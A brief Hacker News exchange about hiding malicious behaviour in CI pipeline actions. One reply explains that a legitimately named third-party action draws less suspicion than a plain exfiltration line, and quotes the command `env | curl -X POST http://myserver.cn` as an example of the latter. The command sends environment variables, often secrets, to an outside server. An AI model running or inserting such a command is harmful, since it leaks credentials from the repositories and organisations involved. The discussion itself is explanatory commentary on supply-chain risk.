Y
Hacker News
new
|
ask
|
show
|
jobs
by
rawling
372 days ago
But similarly, couldn't you just write harmful stuff straight into the action itself?
1 comments
mystifyingpoi
372 days ago
You definitely could, but it is more nuanced than that. You really don't want to be seen doing `env | curl -X POST
http://myserver.cn
` in a company repository. But using a legitly named action doesn't look too suspicious.
link